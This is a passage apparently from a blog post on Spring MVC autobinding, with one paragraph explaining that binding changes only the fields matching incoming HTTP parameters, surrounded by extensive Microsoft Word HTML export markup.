</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</span></div>
<br />
<h3>
<span lang="EN-US" style="mso-ansi-language: EN-US;"><div class="MsoNormal" style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Populating</span></div>
</span></h3>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">There is an
interesting and maybe not so obvious fact about autobinding. During populating
data, Spring MVC makes changes on a field basis; it doesn't create a new object
if something comes from an HTTP request. It means if there is an object from
the model and only one param is received from an HTTP request, the value of
only one field (with the same name as the HTTP param) will be changed and other
fields will stay the same.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
